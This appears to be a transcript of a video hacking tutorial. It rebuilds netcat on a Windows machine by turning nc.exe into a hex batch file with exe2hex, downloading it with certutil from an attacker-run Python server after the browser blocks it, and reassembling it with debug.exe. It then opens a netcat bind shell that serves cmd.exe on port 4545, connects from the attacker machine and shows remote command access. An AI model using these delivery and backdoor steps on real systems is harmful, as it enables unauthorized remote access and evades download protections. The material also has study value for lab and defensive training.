Hey, today we're going to take a look into Debug, which is a program that's available in Windows 32-bit machines. It has a ton of different features, such as assembly, disassembly, dumping out hexadecimal values, so on and so forth. We will look into how we can build a payload from a hex value into an exe file. So in order to do this, we need a machine, and I'm going to be using one of the exe files that we can first convert it into hexadecimal values. If you look into user share in your Kali machine or your Parrot machine, you would find a folder called Windows binaries, which contain um, Windows resources or Windows binaries. You'd find a bunch of different things. The one that I'm going to use is netcat, which is nc.exe. So let's copy that over. Copy user share Windows binaries nc.exe. So we have netcat here. So what we can do is we can compress the file first. We can see we've drastically reduced the file size. So now it's around 29, I guess. So if we do du on netcat, it's 32. It's 32 kilobytes. You can confirm that if you do ls-las. Yeah, it's 29 kilobytes rather than 32. The next thing that we need to do is to convert the exe file into hex. So we'll use a tool called exe2hex for this. exe2hex, we do a h for help. We can see it has a ton of different options. You can convert, into hexadecimal values and then save it as a batch file. You can convert into hexadecimal values and then again save it as a PowerShell file. Both of them could work. On top of that, you can even automate the login sessions using Telnet or binaries if the victim machine is going to support that. In our case, we'll just build it just if you have this works and then transport it using a different mechanism. So we're going to go with the batch format. Feel free to check into the other one as well. So the batch format can, do debug.exe to build it kind of from hex. So let's go. Let's do exe2 hex dash x, and we'll give it the file, and then we'll do dash b to save it as nc.bat batch file. So we now have this batch file, and what we'll do is we'll start a Python server, and we can go over to our Windows machine and download the file. So I have the Python server running. We have nc.exe, we have nc.bat. We'll go for the batch file, download it. Should have downloaded. Okay, if your browser is going to block it, you can turn down the security if you wanted to. One more easier way is to just download it using your command prompt. So if you remember in one of our videos, we saw how certitl can be used to do this. Certitl dash split dash URL cache dash f http the IP address, port number, nc.bat, which is the file name. So we can see this one downloads it. So in case if your browser is blocking, so you can see this one, the browser has blocked it. You can just download that. Let me just go ahead and remove the previous exe file that I have and also this downloaded file that I have. Right click, delete. And also, yeah. Now what we'll do is we have nc.bat here, and if I kind of run this batch file, right, let's see what happens. And that happens. It takes a few seconds for it to complete, and once it's complete, it doesn't work. Now the problem is, if you've noticed this, it's throwing some kind of a weird error. The problem is this is compatible with the legacy devices, so we need to make sure it has this legacy device compatibility. Let's go over to CMD properties, Options, yeah. So this is the part. You choose this option called Use Legacy Console. Um, if it's required, hit OK. Now let's go over, launch that. You can see there is no error this time. It's kind of building all the hexadecimal values into the exe file. Once it's done, we'll have a malicious file in there. Okay, that's done. We can see netcat is now running. If we do a dir, we can see nc.exe, um, nc-h brings up the help. You can do a lot of different things from here using netcat. You can do file transfer. You can monitor logs if you wanted to. You can even spin up a chat client and chat from one device to another device. Or you can maybe do a backdoor. So if you do nc-lsbnp 4545 to listen on port number 45. Let's execute cmd.exe for someone else to connect. While that's going, I also wanted to kind of find out the IP address of the machine. So let's go over and command prompt again, ipconfig 10.02.18. Now we can see this netcat binary is listening on 4545 and it's giving command prompt access to anyone that connects. Let's go over to our machine and let's try connecting to it. And what we'll do is we'll try connecting to the machine 10.02.18 4545 and it's done. We get access to the machine. Who am I? I am mgala user in that domain. Okay, that's it for today. See you guys in another video.